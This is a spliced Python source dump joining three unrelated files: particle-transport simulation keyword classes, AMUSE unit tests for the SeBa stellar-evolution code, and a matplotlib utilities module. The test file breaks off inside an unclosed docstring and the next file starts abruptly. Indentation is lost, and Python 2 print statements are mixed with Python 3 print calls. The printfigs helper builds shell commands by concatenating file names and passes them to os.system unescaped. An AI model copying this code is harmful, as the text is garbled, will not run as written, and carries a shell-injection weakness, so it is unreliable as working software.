def set(self, filename):
"""
Sets filename.
Args:
filename (str): File name of material file (up to 20 characters).
"""
super().set(filename)
class DSMAX(KeywordSequence):
"""Maximum step length of electrons and positrons in body.
.. note::
This parameter is important only for thin bodies; it should be given a
value of the order of one tenth of the body thickness or less.
"""
def __init__(self, maxlength=5000):
keyword = TypeKeyword(
"DSMAX", (int, float), comment="KB, maximum step length in body KB"
)
super().__init__(keyword, maxlength)
def add(self, kb, dsmax):
"""
Sets maximum step length.
Args:
kb (int): Index of body.
dsmax: Maximum step length in cm.
"""
return super().add(kb, dsmax)
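# Hedged usage sketch for DSMAX (body index and step length are illustrative):
# cap the electron/positron step length in body 1 at 2e-4 cm, i.e. roughly one
# tenth of a 20-micron-thick body, as the note above recommends.
def _dsmax_usage_sketch():
    dsmax = DSMAX()
    dsmax.add(1, 2e-4)  # KB=1, DSMAX=2e-4 cm
    return dsmax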
class EABSB(KeywordSequence):
"""Local absorption energies EABSB(KPAR,KB) of particles of type KPAR in body KB.
These values must be larger than EABS(KPAR,M), where M is the material of body KB. When the
particle is moving within body KB, the absorption energy
EABS(KPAR,M) is temporarily set equal to EABSB(KPAR,KB).
Thus, the simulation of the particle history is discontinued
when the energy becomes less than EABSB(KPAR,KB). This
feature can be used, e.g., to reduce the simulation work in
regions of lesser interest.
"""
def __init__(self, maxlength=5000):
keyword = TypeKeyword(
"EABSB",
(int, float, float, float),
comment="KB, local absorption energies, EABSB(1:3)",
)
super().__init__(keyword, maxlength)
def add(self, kb, eabs1, eabs2, eabs3):
"""
Sets local absorption energies.
Args:
kb (int): Index of body.
eabs1 (float): Absorption energy of electrons in eV.
eabs2 (float): Absorption energy of photons in eV.
eabs3 (float): Absorption energy of positrons in eV.
"""
return super().add(kb, eabs1, eabs2, eabs3)
class InteractionForcings(KeywordSequence):
"""Forcing of interactions.
FORCER is the forcing factor, which must
be larger than unity. WLOW and WHIG are the lower and upper
limits of the pweight window where interaction forcing is
applied. When several interaction mechanisms are forced in
the same body, the effective weight window is set equal to
the intersection of the windows for these mechanisms.
If the mean free path for real interactions of type ICOL is
MFP, the program will simulate interactions of this type
(real or forced) with an effective mean free path equal to
MFP/FORCER.
.. hint::
A negative input value of FORCER, -FN, is assumed to mean that a particle
with energy E=EPMAX should interact, on average, +FN times in the course
of its slowing down to rest, for electrons and positrons, or along a mean
free path, for photons. This is very useful, e.g., to generate x-ray
spectra from bulk samples.
"""
def __init__(self, maxlength=120000):
keyword = TypeKeyword(
"IFORCE",
(int, KPAR, ICOL, float, float, float),
comment="KB,KPAR,ICOL,FORCER,WLOW,WHIG",
)
super().__init__(keyword, maxlength)
def add(self, kb, kpar, icol, forcer, wlow, whig):
"""
Adds forcing for an interaction.
Args:
kb (int): Index of body.
kparp (:class:`KPAR`): Type of primary particles
"""
return super().add(kb, kpar, icol, forcer, wlow, whig)
class IBRSPL(KeywordSequence):
"""Bremsstrahlung splitting for electrons and positrons.
.. note::
Note that bremsstrahlung splitting is applied in combination
with interaction forcing and, consequently, it is activated
only in those bodies where interaction forcing is active.
"""
def __init__(self, maxlength=5000):
keyword = TypeKeyword("IBRSPL", (int, float), comment="KB,splitting factor")
super().__init__(keyword, maxlength)
def add(self, kb, ibrspl):
"""
Add Bremsstrahlung splitting.
Args:
kb (int): Index of body.
ibrspl (int): Splitting factor.
"""
return super().add(kb, ibrspl)
class IXRSPL(KeywordSequence):
"""Splitting of characteristic x rays emitted.
Each unsplit x ray with ILB(2)=2 (i.e., of the second generation) when
extracted from the secondary stack is split into IXRSPL quanta.
The new, lighter, quanta are assigned random directions distributed
isotropically.
"""
def __init__(self, maxlength=5000):
keyword = TypeKeyword("IXRSPL", (int, float), comment="KB,splitting factor")
super().__init__(keyword, maxlength)
def add(self, kb, ixrspl):
"""
Add characteristic x rays splitting.
Args:
kb (int): Index of body.
ixrspl (int): Splitting factor.
"""
return super().add(kb, ixrspl)
class NBE(TypeKeyword):
"""Definition of energy distributions of emerging particles."""
def __init__(self):
super().__init__(
"NBE", (float, float, int), comment="Energy window and no. of bins"
)
def set(self, el, eu, nbe):
"""
Sets energy distributions.
Args:
el (float): Lower limit in eV.
eu (float): Upper limit in eV.
nbe (int): Number of bins in the output energy distribution.
Should be less than 1000.
If NBE is positive, energy bins have uniform width,
DE=(EU-EL)/NBE.
When NBE is negative, the bin width increases geometrically
with the energy, i.e., the energy bins have uniform width on a
logarithmic scale.
"""
super().set(el, eu, nbe)
class NBANGL(TypeKeyword):
"""Definition of angular distributions of emerging particles.
.. note::
In the output files, the terms 'upbound' and 'downbound' are used to
denote particles that leave the material system moving upwards (W>0) and
downwards (W<0), respectively.
"""
def __init__(self):
super().__init__(
"NBANGL", (int, int), comment="No. of bins for the angles THETA and PHI"
)
def set(self, nbth, nbph):
"""
Sets angular distributions.
Args:
nbth (int): Numbers of bins for the polar angle THETA.
Should be less than 3600.
If NBTH is positive, angular bins have uniform width,
DTH=180./NBTHE.
When NBTH is negative, the bin width increases geometrically
with THETA, i.e., the bins have uniform width on a logarithmic
scale.
nbph (int): Number of bins for the azimuthal angle PHI
Should be less than 180.
"""
super().set(nbth, nbph)
# TODO: Fix ENDETC, EDSPC. It should be a KeywordSequence
class ENDETC(TypeKeyword):
"""Definition of an energy-deposition detector."""
def __init__(self):
super().__init__(
"ENDETC", (float, float, int), comment="Energy window and no. of bins"
)
def set(self, el, eu, nbe):
"""
Sets energy limits.
Args:
el (float): Lower limit in eV.
eu (float): Upper limit in eV.
nbe (int): Number of bins in the output energy distribution.
Should be less than 1000.
If NBE is positive, energy bins have uniform width,
DE=(EU-EL)/NBE.
When NBE is negative, the bin width increases geometrically
with the energy, i.e., the energy bins have uniform width on a
logarithmic scale.
"""
super().set(el, eu, nbe)
class EDSPC(TypeKeyword):
"""Name of the output spectrum file."""
def __init__(self):
super().__init__("EDSPC", (str,), comment="Output spectrum file name, 20 chars")
def set(self, filename):
"""
Sets filename.
Args:
filename (str): File name of output spectrum file (up to 20 characters).
"""
super().set(filename)
class GRIDX(TypeKeyword):
"""Definition of x-coordinates of the vertices of the dose box."""
def __init__(self):
super().__init__(
"GRIDX",
(float, float, int),
comment="X coords of the box vertices, no. of bins",
)
def set(self, xl, xu, ndbx):
"""
Sets dimensions.
Args:
xl (float): Lower limit of the dose box along the x-axis in cm.
xu (float): Upper limit of the dose box along the x-axis in cm.
ndbx (int): Number of bins (i.e. voxels) along the x-axis.
"""
super().set(xl, xu, ndbx)
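# Hedged usage sketch for GRIDX (limits and bin count are illustrative): a dose
# box spanning -0.01 cm to 0.01 cm along x, divided into 50 voxels.
def _gridx_usage_sketch():
    gridx = GRIDX()
    gridx.set(-0.01, 0.01, 50)
    return gridx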
class GRIDY(TypeKeyword):
"""Definition of y-coordinates of the vertices of the dose box."""
def __init__(self):
super().__init__(
"GRIDY",
(float, float, int),
comment="Y coords of the box vertices, no. of bins",
)
def set(self, yl, yu, ndby):
"""
Sets dimensions.
Args:
yl (float): Lower limit of the dose box along the y-axis in cm.
yu (float): Upper limit of the dose box along the y-axis in cm.
ndby (int): Number of bins (i.e. voxels) along the y-axis.
"""
super().set(yl, yu, ndby)
class GRIDZ(TypeKeyword):
"""Definition of z-coordinates of the vertices of the dose box."""
def __init__(self):
super().__init__(
"GRIDZ",
(float, float, int),
comment="Z coords of the box vertices, no. of bins",
)
def set(self, zl, zu, ndbz):
"""
Sets dimensions.
Args:
            zl (float): Lower limit of the dose box along the z-axis in cm.
            zu (float): Upper limit of the dose box along the z-axis in cm.
            ndbz (int): Number of bins (i.e. voxels) along the z-axis.
        """
        super().set(zl, zu, ndbz)
import numpy
from amuse.test.amusetest import TestWithMPI
from amuse.community.seba.interface import SeBaInterface, SeBa
from amuse.units import units
from amuse.units import constants
from amuse.datamodel import Particle
from amuse.datamodel import Particles
class TestSeBaInterface(TestWithMPI):
def test1(self):
instance = self.new_instance_of_an_optional_code(SeBaInterface)
endtime, mass, radius, luminosity, temperature, time_step, stellar_type, error = instance.evolve_star(1, 4600, 0.02)
self.assertEquals(error, 0)
self.assertTrue( endtime <= 4600.0)
self.assertAlmostRelativeEqual(endtime, 4600.0, 4)
self.assertAlmostRelativeEqual(mass, 1.0, 6)
self.assertAlmostRelativeEqual(radius, 0.9856, 4)
self.assertAlmostRelativeEqual(luminosity, 0.9585, 4)
self.assertAlmostRelativeEqual(temperature, 5751, 4)
self.assertAlmostRelativeEqual(time_step, 1089.3, 4)
self.assertEqual(stellar_type, 1)
instance.stop()
def test2(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle(1.)
self.assertEquals(error, 0)
self.assertEquals(index, 1)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 1.0, 6)
value, error = instance.get_radius(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 0.88824945029751212, 6)
stellar_type, error = instance.get_stellar_type(index)
self.assertEquals(error, 0)
self.assertEquals(stellar_type, 1)
instance.stop()
def test3(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle(1.)
self.assertEquals(error, 0)
self.assertEquals(index, 1)
error = instance.evolve_model(4600)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 1.0, 6)
value, error = instance.get_radius(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 0.9856, 4)
value, error = instance.get_temperature(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 5751, 4)
value, error = instance.get_time_step(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 1089.3, 4)
stellar_type, error = instance.get_stellar_type(index)
self.assertEquals(error, 0)
self.assertEquals(stellar_type, 1)
instance.stop()
def test4(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle(1.)
self.assertEquals(error, 0)
self.assertEquals(index, 1)
for t in range(46):
error = instance.evolve_model((t+1) * 100)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 1.0, 6)
value, error = instance.get_radius(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 0.9856, 4)
value, error = instance.get_temperature(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 5751, 4)
value, error = instance.get_time_step(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 1089.3, 4)
stellar_type, error = instance.get_stellar_type(index)
self.assertEquals(error, 0)
self.assertEquals(stellar_type, 1)
instance.stop()
def test5(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle([1., 2., 3.])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2,3])
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 2 , 6)
mass, error = instance.get_mass(3)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 3, 6)
error = instance.evolve_model(4600)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
        print(mass)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass[0], 1.0, 6)
self.assertAlmostRelativeEqual(mass[1], 0.62973, 4)
self.assertAlmostRelativeEqual(mass[2], 0.75012, 4)
instance.stop()
def test6(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle([1., 2., 3.])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2,3])
for t in range(46):
error = instance.evolve_model((t+1) * 100)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
        print(mass)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, [1.0, 0.62973, 0.75072], 4)
instance.stop()
def test7(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle([1., 2., 3.])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2,3])
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 2 , 6)
mass, error = instance.get_mass(3)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 3, 6)
mass, error = instance.get_mass(4)
self.assertEquals(error, -1)
error = instance.delete_star(2)
self.assertEquals(error, 0)
mass, error = instance.get_mass(2)
self.assertEquals(error, -1)
mass, error = instance.get_mass(3)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 3, 6)
index, error = instance.new_particle(4.)
self.assertEquals(error, 0)
self.assertEquals(index, 4)
instance.stop()
def test8(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle([3.0,1.0,2.0])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2,3])
error = instance.delete_star(1)
self.assertEquals(error, 0)
error = instance.evolve_model(4600);
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 1, 6)
error = instance.delete_star(3)
self.assertEquals(error, 0)
index,error = instance.new_particle([5.0])
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 5.0, 6)
error = instance.evolve_model(5000);
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.99057, 4)
error = instance.delete_star(2)
self.assertEquals(error, 0)
error = instance.delete_star(index)
self.assertEquals(error, 0)
for i in range(4):
mass, error = instance.get_mass(index+1)
self.assertEquals(error, -1)
index,error = instance.new_particle([5.0])
self.assertEquals(error, 0)
error = instance.evolve_model(10000);
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.99057, 4)
instance.stop()
def test9(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
instance.set_metallicity(0.001)
index,error = instance.new_particle([3.0,0.3])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2])
mu = (3.3 | units.MSun) * constants.G
orbital_period = 200.0 | units.day
semi_major_axis = (((orbital_period / 2.0 * numpy.pi)**2)*mu)**(1.0/3.0)
        print(semi_major_axis.value_in(units.RSun))
eccentricity = 0.5
index,error = instance.new_binary(
semi_major_axis.value_in(units.RSun),
eccentricity,
index[0],
index[1]
)
self.assertEquals(error, 0)
self.assertEquals(index, 3)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 3.3, 4)
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.3, 4)
error = instance.evolve_model(300)
self.assertEquals(error, 0)
mass, error = instance.get_mass(1)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 2.98777, 4)
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.29999, 4)
error = instance.evolve_model(400)
self.assertEquals(error, 0)
mass, error = instance.get_mass(1)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.86679, 4)
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.3, 4)
error = instance.delete_binary(index)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
self.assertEquals(error, -1)
        # check if singles are still in the model and evolve
value, error = instance.get_age([1,2])
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 400, 4)
error = instance.evolve_model(500)
self.assertEquals(error, 0)
value, error = instance.get_age([1,2])
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 500, 4)
class TestSeBa(TestWithMPI):
def test1(self):
instance = self.new_instance_of_an_optional_code(SeBa)
endtime, mass, radius, luminosity, temperature, time_step, stellar_type = instance.evolve_star(1 | units.MSun, 4600 | units.Myr, 0.02)
self.assertTrue( endtime <= 4600 | units.Myr)
self.assertAlmostRelativeEqual(mass, 1.0 | units.MSun, 4)
self.assertAlmostRelativeEqual(radius, 0.9856 | units.RSun, 4)
self.assertAlmostRelativeEqual(luminosity, 0.9585 | units.LSun, 4)
self.assertAlmostRelativeEqual(temperature, 5751 | units.K, 4)
self.assertAlmostRelativeEqual(time_step, 1089.3 | units.Myr, 4)
self.assertEqual(stellar_type, 1 | units.stellar_type)
def test2(self):
instance = self.new_instance_of_an_optional_code(SeBa)
p = Particle()
p.mass = 5 | units.MSun
p.metallicity = 0.02
p = instance.particles.add_particle(p)
instance.evolve_model(130 | units.Myr)
        print(p)
self.assertAlmostRelativeEqual(p.mass, 0.9906 | units.MSun, 4)
def test3(self):
print "Testing evolution of a close binary system..."
instance = self.new_instance_of_an_optional_code(SeBa)
instance.commit_parameters()
stars = Particles(2)
stars[0].mass = 3.0 | units.MSun
stars[1].mass = 0.3 | units.MSun
mu = (3.3 | units.MSun) * constants.G
orbital_period = 200.0 | units.day
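        # Kepler's third law: a^3 = G*(M1+M2)*(P/(2*pi))^2, with mu = G*(M1+M2) above.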
semi_major_axis = (((orbital_period / (2.0 * numpy.pi))**2)*mu)**(1.0/3.0)
instance.particles.add_particles(stars)
binaries = Particles(1)
binary = binaries[0]
binary.semi_major_axis = semi_major_axis
binary.eccentricity = 0.5
binary.child1 = stars[0]
binary.child2 = stars[1]
instance.binaries.add_particles(binaries)
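        # AMUSE channels copy attribute values from the community code's internal
        # particle sets into the local Particles instances on each .copy() call.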
from_seba_to_model = instance.particles.new_channel_to(stars)
from_seba_to_model.copy()
from_seba_to_model_binaries = instance.binaries.new_channel_to(binaries)
from_seba_to_model_binaries.copy()
previous_type = binary.child1.stellar_type
results = []
current_time = 0 | units.Myr
while current_time < (480 | units.Myr):
instance.update_time_steps()
# The next line appears a bit weird, but saves time for this simple test.
deltat = max(1.0*instance.binaries[0].time_step, 0.1| units.Myr)
current_time = current_time + deltat
instance.evolve_model(current_time)
from_seba_to_model.copy()
from_seba_to_model_binaries.copy()
if not binary.child1.stellar_type == previous_type:
results.append((binary.age, binary.child1.mass, binary.child1.stellar_type))
previous_type = binary.child1.stellar_type
self.assertEqual(len(results), 6)
for x in results:
            print(x)
types = (
"Hertzsprung Gap",
"First Giant Branch",
"Core Helium Burning",
"First Asymptotic Giant Branch",
"Giant Branch Naked Helium star",
"Carbon/Oxygen White Dwarf",
)
for result, expected in zip(results, types):
self.assertEquals(str(result[2]), expected)
times = (
377.6369 | units.Myr,
379.8877 | units.Myr,
382.3112 | units.Myr,
473.4804 | units.Myr,
475.4766 | units.Myr,
476.6182 | units.Myr,
)
for result, expected in zip(results, times):
self.assertAlmostEqual(result[0].value_in(units.Myr), expected.value_in(units.Myr), 0)
masses = (
3.0000 | units.MSun,
3.0000 | units.MSun,
2.9983 | units.MSun,
2.9741 | units.MSun,
0.6710 | units.MSun,
0.6596 | units.MSun,
)
for result, expected in zip(results, masses):
self.assertAlmostEqual(result[1].value_in(units.MSun), expected.value_in(units.MSun), 2)
instance.stop()
def test5(self):
instance = self.new_instance_of_an_optional_code(SeBa)
self.assertAlmostRelativeEquals(instance.parameters.metallicity , 0.02)
instance.parameters.metallicity = 0.04
self.assertAlmostRelativeEquals(instance.parameters.metallicity , 0.04)
def test6(self):
instance = self.new_instance_of_an_optional_code(SeBa)
self.assertFalse(instance.parameters.is_logging_of_evolve_enabled)
instance.parameters.is_logging_of_evolve_enabled = True
self.assertTrue(instance.parameters.is_logging_of_evolve_enabled)
def test7(self):
instance = self.new_instance_of_an_optional_code(SeBa)
instance.commit_parameters()
stars = Particles(2)
stars[0].mass = 3.0 | units.MSun
stars[1].mass = 0.3 | units.MSun
mu = (3.3 | units.MSun) * constants.G
orbital_period = 200.0 | units.day
semi_major_axis = (((orbital_period / (2.0 * numpy.pi))**2)*mu)**(1.0/3.0)
instance.particles.add_particles(stars)
binaries = Particles(1)
binary = binaries[0]
binary.semi_major_axis = semi_major_axis
binary.eccentricity = 0.5
binary.child1 = stars[0]
binary.child2 = stars[1]
instance.binaries.add_particles(binaries)
self.assertAlmostRelativeEquals(instance.binaries[0].child1.mass, 3.0 | units.MSun, 4)
self.assertAlmostRelativeEquals(instance.binaries[0].child2.mass, 0.3 | units.MSun, 4)
def xtest7(self):
instance = self.new_instance_of_an_optional_code(SeBa)
instance.parameters.metallicity = 0.03
p = Particle()
p.mass = 99.1605930967 | units.MSun
p = instance.particles.add_particle(p)
instance.evolve_model(614 | units.Myr)
        print(p.stellar_type)
self.assertEquals(str(p.stellar_type),'Black Hole')
self.assertAlmostRelativeEqual(p.mass, 0.9906 | units.MSun, 4)
def test8(self):
instance = self.new_instance_of_an_optional_code(SeBa)
instance.parameters.supernova_kick_velocity = 0 | units.kms
instance.commit_parameters()
print "v_kick=", instance.parameters.supernova_kick_velocity
stars = Particles(2)
stars[0].mass = 10.0 | units.MSun
stars[1].mass = 9 | units.MSun
semi_major_axis = 10000|units.AU
instance.particles.add_particles(stars)
binaries = Particles(1)
binary = binaries[0]
binary.semi_major_axis = semi_major_axis
binary.eccentricity = 0
binary.child1 = stars[0]
binary.child2 = stars[1]
instance.binaries.add_particles(binaries)
instance.evolve_model(30|units.Myr)
        print(instance.particles)
        print(instance.binaries)
self.assertAlmostRelativeEquals(instance.binaries[0].eccentricity, 0.7872, 4)
def test9(self):
instance = self.new_instance_of_an_optional_code(SeBa)
stars = Particles(2)
stars[0].mass = 10.0 | units.MSun
stars[1].mass = 9 | units.MSun
instance.particles.add_particles(stars)
instance.evolve_model(30|units.Myr)
self.assertAlmostRelativeEquals(instance.particles.age, [30,30] |units.Myr)
self.assertAlmostRelativeEquals(instance.model_time, 30 | units.Myr)
self.assertAlmostRelativeEquals(instance.particles[0].mass, 1.2263 | units.MSun, 4)
self.assertAlmostRelativeEquals(instance.particles[1].mass, 8.8682 | units.MSun, 4)
stars = Particles(2)
stars[0].mass = 10.0 | units.MSun
stars[1].mass = 9 | units.MSun
instance.particles.add_particles(stars)
instance.evolve_model(60|units.Myr)
        print(instance.particles.age)
        print(instance.particles.mass)
self.assertAlmostRelativeEquals(instance.model_time, 60 | units.Myr)
self.assertAlmostRelativeEquals(instance.particles.age, [60,60,30,30] |units.Myr)
self.assertAlmostRelativeEquals(instance.particles[2].mass, 1.2263 | units.MSun, 4)
self.assertAlmostRelativeEquals(instance.particles[3].mass, 8.8682 | units.MSun, 4)
def test10(self):
""" Test supernova | |
"""A collection of tools, tips, and tricks.
2009-07-20 22:36 IJC: Created
2010-10-28 11:53 IJMC: Updated documentation for Sphinx.
2011-06-15 09:34 IJMC: More functions have been added; cleaned documentation.
"""
import pdb
import numpy as np
def getfigs():
"""Return a list of all open matplotlib figures.
No inputs or options."""
from matplotlib._pylab_helpers import Gcf
figs = [manager.canvas.figure for manager in Gcf.get_all_fig_managers()]
figlist = [fig.number for fig in figs]
return figlist
def nextfig():
"""Return one greater than the largest-numbered figure currently
open. If no figures are open, return unity.
No inputs or options."""
# 2010-03-01 14:28 IJC: Created
figlist = getfigs()
if len(figlist)==0:
return 1
else:
return max(figlist)+1
def printfigs(filename, figs=None, format=None, pdfmode='texexec', verbose=False, closefigs=False):
"""Print desired figures using designated 'format'. Concatenate PDFs.
:Inputs:
filename -- string. prepended to all open figures
figs -- int or list.
figures to access, then apply savefig to. If None, print
all open figures; if -1, print current figure.
format -- string or list of strings.
if 'pdf', all images are concatenated into one file (use
"pdfs" for individual pdf figure files)
pdfmode -- string;
method of concatenating PDFs. Either 'texexec' or 'gs'
(for GhostScript) or 'tar' to wrap individual
figures in a Tarball.
closefigs -- bool
If True, close each figure after printing it to disk.
:NOTES:
If no explicit path is passed and a subdirectory 'figures'
exists in the current directory, the figures will be printed in
'figures' instead.
:EXAMPLE:
::
from pylab import *
figure(1); plot(arange(10), randn(10), 'ob')
figure(2); plot(arange(15), randn(15), '-xr')
printfigs('testing')
!open testing.pdf
"""
# 2009-07-20 23:10 IJC: Created; inspired by FGD.
# 2009-09-08 13:54 IJC: Made it work with single-figure, non-list input.
# 2010-02-02 11:50 IJC: Now it kills the 'logfile' detritus.
# 2010-10-27 17:05 IJC: New texexec syntax is "result=...", not "result ..."
# 2011-03-01 18:14 IJC: Added capability for multiple formats (in
# a list). Also, figure numbers are not
# catted to the filename when saving a
# single figure.
# 2011-08-29 10:23 IJMC: Now don't try to concatenate single PDF figures.
# 2012-11-01 11:41 IJMC: Slightly changed if-block for 'figs'.
# 2014-05-03 15:04 IJMC: Added 'closefigs' flag.
# 2014-09-02 08:50 IJMC: Added 'tar' PDFMODE
# 2015-12-08 09:03 IJMC: Now 'None' is also valid PDF mode
from pylab import savefig, figure, gcf, close
from matplotlib._pylab_helpers import Gcf
import os
import pdb
figlist = getfigs()
if verbose: print "Available figure numbers>>" ,figlist
if figs is None:
figs = figlist
    elif figs == -1:
figs = [gcf().number]
else:
if hasattr(figs, '__iter__'):
figs = list(figs)
else:
figs = [figs]
figlist = [val for val in figs if val in figlist]
nfig = len(figlist)
print "Figures to print>>",figlist
    if format is None:
format = filename[-3::]
filename = filename[0:len(filename)-4]
if hasattr(format, 'capitalize'):
format = [format]
nformat = 1
elif hasattr(format, '__iter__'):
nformat = len(format)
else:
format = [str(format)]
nformat = 1
if len(figlist)==0:
print "No open figures found; exiting."
return
for thisformat in format:
fnamelist = []
for ii in range(nfig):
if nfig>1:
fname = filename + str(figlist[ii])
else:
fname = filename
if thisformat=='pdf' and nfig>1:
fname = fname + '_temp'
if thisformat=='pdfs':
fname = fname + '.pdf'
else:
fname = fname + '.' + thisformat
figure(figlist[ii])
savefig(fname )
fnamelist.append(fname)
if closefigs and thisformat==format[-1]: # last time at this figure
close(figlist[ii])
if thisformat=='pdf':
if nfig==1:
savefig(fnamelist[0])
else: # we have to concatenate multiple PDF figures:
bigfilename = filename + '.' + thisformat
if os.path.isfile(bigfilename):
os.remove(bigfilename)
if pdfmode is None:
execstr, rmstr = '', ''
elif pdfmode=='gs':
execstr = 'gs -q -sPAPERSIZE=letter -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=' + bigfilename
rmstr = ''
elif pdfmode=='texexec':
execstr = 'texexec --pdfcopy --result=' + bigfilename
rmstr = 'rm %s' % bigfilename.replace('pdf','log')
elif pdfmode[0:3]=='tar':
execstr = 'tar -cvf %s ' % bigfilename.replace('pdf','tar')
fnamelist_local = [os.path.split(fn)[1] for fn in fnamelist]
[os.rename(fn, fn2) for fn,fn2 in zip(fnamelist, fnamelist_local)]
rmstr = 'rm ' + ' '.join(fnamelist_local)
fnamelist = fnamelist_local
else:
execstr = ''
rmstr = ''
for fn in fnamelist:
execstr += ' ' + fn
#pdb.set_trace()
                if verbose: print("PDFMODE exec call>>", execstr)
os.system(execstr)
#subprocess.call(execstr)
#pdb.set_trace()
if len(rmstr)>0:
os.system(rmstr)
if pdfmode is not None:
for fn in fnamelist:
try:
os.remove(fn)
except:
pass
return
def plotstyle(i, c=['b', 'g', 'r', 'c', 'm', 'y', 'k'], \
s=['.', 'x', 's', '^', '*', 'o', '+', 'v', 'p', 'D'], \
l=['-', '--', '-.', ':']):
"""Return plot properties to help distinguish many types of plot symbols.
:INPUT:
i -- int.
:OPTIONAL INPUT:
c -- color, or list of colors accepted by pylab.plot
s -- symbol, or list of symbols accepted by pylab.plot
l -- linestyle, or list of linestyles accepted by pylab.plot
:OUTPUT:
tuple of (color, symbol, linestyle)
:REQUIREMENTS: :doc:`numpy`
"""
# 2009-09-10 16:42 IJC: Created
from numpy import tile, array
    if not isinstance(c, list):
        c = list(c)
    if not isinstance(s, list):
        s = list(s)
    if not isinstance(l, list):
        l = list(l)
nc = len(c)
ns = len(s)
nl = len(l)
if not hasattr(i,'__iter__'):
i = array([i])
i = abs(array(i))
nrepc = (max(i)/nc+1.).astype(int)
nreps = (max(i)/ns+1.).astype(int)
nrepl = (max(i)/nl+1.).astype(int)
c = tile(c, nrepc)
s = tile(s, nreps)
l = tile(l, nrepl)
if len(i)==1:
ret = c[i][0], s[i][0], l[i][0]
else:
ret = list(c[i]),list(s[i]),list(l[i])
return ret
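# Illustrative usage sketch for plotstyle() (hypothetical helper, not part of the
# original module): each series gets a distinct (color, symbol, linestyle) triple,
# which pylab accepts as a concatenated format string such as 'b.-'.
def _example_plotstyle_usage(n_series=10):
    """Plot several noisy series, each drawn with the style returned by plotstyle(i)."""
    import numpy as np
    import pylab as plt
    x = np.arange(20)
    for i in range(n_series):
        color, symbol, linestyle = plotstyle(i)
        plt.plot(x, np.random.randn(20) + i, color + symbol + linestyle)
    plt.show()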
def flatten(L, maxdepth=100):
"""Flatten a list.
Stolen from http://mail.python.org/pipermail/tutor/2001-January/002914.html"""
# 2009-09-10 16:54 IJC: Input.
    if not isinstance(L, list): return [L]
    if L == [] or maxdepth <= 0:
        return L
    else:
        maxdepth -= 1
        return flatten(L[0], maxdepth=maxdepth) + flatten(L[1:], maxdepth=maxdepth)
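# Example (illustrative): flatten([1, [2, [3, 4]], 5]) returns [1, 2, 3, 4, 5];
# the optional maxdepth argument bounds how many levels of nesting are expanded.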
def replaceall(seq, obj, rep):
"""Replace all instances of 'obj' with 'rep' in list 'seq'
:INPUT:
seq -- (list) list within which to find-and-replace elements
obj -- target object to replace
rep -- replacement object
:EXAMPLE:
::
import tools
b = [2, ['spam', ['eggs', 5, dict(spam=3)]]]
tools.replaceall(b, 'spam', 'bacon')
print b
